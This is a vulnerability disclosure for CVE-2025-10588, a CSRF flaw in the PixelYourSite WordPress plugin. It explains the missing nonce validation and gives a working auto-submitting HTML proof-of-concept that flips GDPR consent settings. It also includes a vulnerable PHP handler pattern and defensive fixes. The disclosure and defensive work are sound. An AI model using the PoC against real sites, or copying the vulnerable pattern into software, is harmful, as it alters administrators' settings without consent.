PixelYourSite (Free) is a widely used tracking and analytics integration plugin, active on 500k+ WordPress sites. It centralizes pixel/tag configuration for platforms like Meta and Google, and exposes consent-related toggles in its admin UI. During testing we identified CVE-2025-10588, a Cross-Site Request Forgery (CSRF) flaw that allows an attacker to trick a logged-in administrator into silently enabling GDPR AJAX mode and related consent integrations without valid nonce verification. The code checks that a _wpnonce parameter is present and that the victim holds the manage_pys capability, but it never verifies the nonce value before mutating options, so any cross-origin GET or POST carrying an arbitrary _wpnonce string causes a state change.

CVE: CVE-2025-10588
Plugin Version: PixelYourSite <= 11.1.2
Severity: High
All Time Downloads: 17 133 912
Active installations: 500 000+
Publicly Published: September 4, 2025
Last Updated: September 4, 2025
Researcher: Dmitrii Ignatyev
PoC: Yes
Exploit: No
References:
  https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-10588
  https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/pixelyoursite/pixelyoursite-1112-cross-site-request-forgery-to-gdpr-options-modification

Timeline

September 4, 2025: Plugin testing and vulnerability detection in PixelYourSite – Your smart PIXEL (TAG) & API Manager has been completed
September 4, 2025: I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
October 21, 2025: Registered CVE-2025-10588

Discovery of the Vulnerability

The plugin’s administrative request handler, invoked on every /wp-admin/* load via admin_init, inspects the request for a _wpnonce field and pys[enable_gdpr_ajax]. If present—and if the user has manage_pys—it updates internal flags:

  • gdpr_ajax_enabled
  • gdpr_cookie_law_info_integration_enabled
  • consent_magic_integration_enabled

Critically, the handler performs no nonce verification (wp_verify_nonce() / check_admin_referer()); it accepts any _wpnonce string. Consequently, a malicious page can auto-submit a cross-origin request to /wp-admin/index.php or /wp-admin/admin.php?page=pixelyoursite carrying _wpnonce=<anything>&pys[enable_gdpr_ajax]=1, and the victim's browser, which attaches the WordPress session cookies, flips these settings without any further interaction from the administrator.

Understanding CSRF Attacks

In WordPress, secure state changes require two pillars:

  1. Capability checks (e.g., current_user_can('manage_options')) to ensure the user is allowed to perform the action; and
  2. Nonce verification (check_admin_referer() / wp_verify_nonce()) to ensure the request originated from the site itself.

Missing the nonce check is what enables CSRF (a missing capability check is a separate authorization flaw that lets low-privileged users act directly). Numerous historic CVEs show that checking only capabilities is insufficient, because the administrator’s browser will happily send authenticated requests to attacker-controlled forms or iframes. CVE-2025-10588 fits this pattern exactly: nonce presence is checked, but not its validity, so an attacker can flip options as soon as an admin visits a crafted page.

Exploiting the CSRF Vulnerability

To exploit CVE-2025-10588, an attacker who holds no cookies or session on the target site hosts a page like the one below and lures an authenticated administrator into visiting it; the victim's browser attaches its own WordPress cookies to the auto-submitted request:

POC:

<html>
  <body>
    <!-- No method attribute, so the browser issues a GET; the handler accepts GET or POST -->
    <form action="http://127.0.0.1/wordpress/wp-admin/index.php">
      <!-- Any value passes: the plugin only checks that _wpnonce is present -->
      <input type="hidden" name="_wpnonce" value="1" />
      <input type="hidden" name="pys[enable_gdpr_ajax]" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');  // hide the attacker page's path in the history entry
      document.forms[0].submit();      // auto-submit: the victim never has to click
    </script>
  </body>
</html>

Impact

  • Compliance drift: An attacker can change consent behavior, enabling AJAX-based collection routes that bypass expected user flows, causing GDPR/CCPA compliance misalignment.
  • Operational side-effects: Admins may troubleshoot “mysterious” tracking behavior, waste time, or unintentionally ship configurations that violate internal policies.
  • Chaining: If other toggles are wired similarly, an attacker could flip multiple settings to weaken defenses or prep subsequent social-engineering steps.

While no data exfiltration occurs directly, the unauthorized state change is material—particularly for regulated sites—because it alters how and when tracking executes.

Recommendations for Improved Security

For the plugin vendor (PixelYourSite):

  1. Verify nonces: Replace the presence check with check_admin_referer( 'pys_settings', 'pys_settings_nonce' ) (or equivalent), paired with wp_nonce_field( 'pys_settings', 'pys_settings_nonce' ) in the settings form, so the nonce value is validated against the action and the current user rather than merely observed.
  2. Require POST: Process mutations only on POST, not GET; early-return on other methods.
  3. Scope changes to the settings screen: Perform updates only when on the plugin’s admin page and after explicit user action.
  4. UI confirmation: Consider a confirmation step or success notice tied to the verified nonce submission for defense-in-depth.
  5. Same-origin hardening: X-Frame-Options: SAMEORIGIN (or CSP frame-ancestors) blocks the framed variant of this attack, but neither header stops the top-level form submission used in the PoC above, and CSP form-action only governs where the site's own pages may submit, not who may post to the site. Treat these headers as defense-in-depth behind nonce verification; a server-side check of the Sec-Fetch-Site request header (rejecting cross-site on mutating requests) is a cheaper additional layer.
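The following is an added example, not PixelYourSite's code: it reconstructs the admin_init pattern described in the Discovery section (presence check, capability check, no nonce validation) and places beside it a hardened handler that applies the vendor recommendations above (nonce verified, POST only, scoped to an explicit settings action). The option key pys_gdpr_flags, the nonce action pys_save_gdpr, the field name pys_settings_nonce and the settings page slug are assumptions; the manage_pys capability and the pys[enable_gdpr_ajax] parameter are taken from the advisory.

```php
<?php
/**
 * Added example (not PixelYourSite's code). Assumed names: option key
 * 'pys_gdpr_flags', nonce action 'pys_save_gdpr', field 'pys_settings_nonce'.
 */

/* BEFORE: the CVE-2025-10588 pattern. Shown for contrast only; never hook it. */
function pys_example_vulnerable_handler() {
    // Fires on every /wp-admin/* request, GET or POST alike.
    if ( ! isset( $_REQUEST['_wpnonce'], $_REQUEST['pys']['enable_gdpr_ajax'] ) ) {
        return;
    }
    if ( ! current_user_can( 'manage_pys' ) ) {
        return;
    }
    // _wpnonce is only tested for presence; its VALUE is never verified, so
    // `_wpnonce=1` from a cross-site form passes and the flag is flipped.
    // (The related integration flags would follow the same pattern.)
    $flags = (array) get_option( 'pys_gdpr_flags', array() );
    $flags['gdpr_ajax_enabled'] = ! empty( $_REQUEST['pys']['enable_gdpr_ajax'] );
    update_option( 'pys_gdpr_flags', $flags );
}

/* AFTER: dedicated admin-post action, POST only, nonce value verified. */

// Settings form rendered on the plugin's own screen. wp_nonce_field() emits a
// token bound to the action name and to the current user's session.
function pys_example_render_gdpr_form() {
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>">
        <input type="hidden" name="action" value="pys_save_gdpr" />
        <?php wp_nonce_field( 'pys_save_gdpr', 'pys_settings_nonce' ); ?>
        <label>
            <input type="checkbox" name="pys[enable_gdpr_ajax]" value="1" />
            Enable GDPR AJAX mode
        </label>
        <?php submit_button( 'Save changes' ); ?>
    </form>
    <?php
}

// Runs only when a logged-in user submits action=pys_save_gdpr to
// admin-post.php, never on ordinary dashboard page loads.
add_action( 'admin_post_pys_save_gdpr', 'pys_example_save_gdpr' );

function pys_example_save_gdpr() {
    if ( 'POST' !== ( $_SERVER['REQUEST_METHOD'] ?? '' ) ) {
        wp_die( 'Settings can only be changed with a POST request.', 405 );
    }
    if ( ! current_user_can( 'manage_pys' ) ) {
        wp_die( 'You are not allowed to change these settings.', 403 );
    }
    // Verifies the nonce VALUE for this action and this user. On failure
    // WordPress stops with a 403 "link has expired" page, so a forged
    // pys_settings_nonce=1 never reaches update_option().
    check_admin_referer( 'pys_save_gdpr', 'pys_settings_nonce' );

    $flags = (array) get_option( 'pys_gdpr_flags', array() );
    $flags['gdpr_ajax_enabled'] = ! empty( $_POST['pys']['enable_gdpr_ajax'] );
    update_option( 'pys_gdpr_flags', $flags );

    // Post/Redirect/Get back to the settings screen with a success notice.
    wp_safe_redirect( add_query_arg( 'settings-updated', 'true',
        admin_url( 'admin.php?page=pixelyoursite' ) ) );
    exit;
}
```

The key difference is not the extra checks but where the handler lives: admin_post_{action} only fires for an explicit submission of that action by an authenticated user, so the dashboard-wide GET surface that the PoC targets disappears entirely, and check_admin_referer() then rejects any token the attacker cannot obtain.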

For site owners/admins:

  • Update to a patched version as soon as it’s available.
  • Adopt cookie protections: Set SameSite on the WordPress auth cookies. Note that SameSite=Lax still sends cookies on top-level GET navigations, which is exactly what the PoC's method-less form (a GET) performs, so Lax alone does not stop this attack unless the handler also refuses GET; SameSite=Strict does stop it, at the cost of dropping the session on links followed from other sites.
  • Limit simultaneous admin browsing: Avoid visiting untrusted sites while logged into WordPress.
  • WAF rules: Temporarily block unexpected pys[enable_gdpr_ajax] submissions to /wp-admin/ outside the plugin’s settings POST.
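As an added example of the interim WAF rule above (this is not CleanTalk's or PixelYourSite's code), the following must-use plugin blocks any request carrying pys[enable_gdpr_ajax] unless it is a POST that the browser's Sec-Fetch-Site header, or failing that the Origin/Referer host, ties to this site. It assumes the plugin's own handler runs on admin_init at the default priority 10, so priority 0 runs first; the parameter name comes from the advisory.

```php
<?php
/**
 * Plugin Name: PYS CSRF virtual patch (added example)
 * Description: Drop into wp-content/mu-plugins/ until a patched release is installed.
 * Not CleanTalk's or PixelYourSite's code; assumes the plugin hooks admin_init at priority 10.
 */

// A request that mutates the GDPR flags is trusted only if it is a POST whose
// provenance headers say it came from our own origin.
function pys_vp_is_trusted_request( array $server, string $home_host ): bool {
    if ( 'POST' !== ( $server['REQUEST_METHOD'] ?? '' ) ) {
        return false; // GET can never be a legitimate settings save.
    }
    // Browsers that implement Fetch Metadata label cross-site form posts
    // 'cross-site'; only 'same-origin' is acceptable for a mutation.
    $sfs = strtolower( $server['HTTP_SEC_FETCH_SITE'] ?? '' );
    if ( '' !== $sfs ) {
        return 'same-origin' === $sfs;
    }
    // Fallback for clients without Fetch Metadata: Origin, then Referer,
    // must name our host. A request with neither is refused.
    foreach ( array( 'HTTP_ORIGIN', 'HTTP_REFERER' ) as $header ) {
        if ( ! empty( $server[ $header ] ) ) {
            $host = wp_parse_url( $server[ $header ], PHP_URL_HOST );
            return is_string( $host ) && 0 === strcasecmp( $host, $home_host );
        }
    }
    return false;
}

add_action( 'admin_init', function () {
    // Only requests carrying the option-mutating parameter are of interest.
    if ( ! isset( $_REQUEST['pys']['enable_gdpr_ajax'] ) ) {
        return;
    }
    $home_host = (string) wp_parse_url( home_url(), PHP_URL_HOST );
    if ( pys_vp_is_trusted_request( $_SERVER, $home_host ) ) {
        return;
    }
    // Leave a trace for incident review, then stop before the plugin's handler runs.
    error_log( sprintf(
        'pys-vp: blocked cross-site pys[enable_gdpr_ajax] from %s (%s %s, Sec-Fetch-Site=%s)',
        $_SERVER['REMOTE_ADDR'] ?? '-',
        $_SERVER['REQUEST_METHOD'] ?? '-',
        $_SERVER['REQUEST_URI'] ?? '-',
        $_SERVER['HTTP_SEC_FETCH_SITE'] ?? 'absent'
    ) );
    wp_die( 'Blocked: cross-site settings change.', 'Forbidden', 403 );
}, 0 ); // priority 0: runs before the plugin's own admin_init handler
```

This is a virtual patch, not a fix: it relies on the plugin registering its handler after priority 0 and on request provenance headers, so remove it once the vendor ships nonce verification. The Referer fallback matters because some privacy extensions strip Referer; such requests are rejected rather than allowed, which is the safe failure mode for a mutating endpoint.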

By taking proactive measures to address CSRF vulnerabilities like CVE-2025-10588, WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.


Dmitrii I.
CVE-2025-10588 – PixelYourSite – Cross-Site Request Forgery (CSRF) to option updating – POC
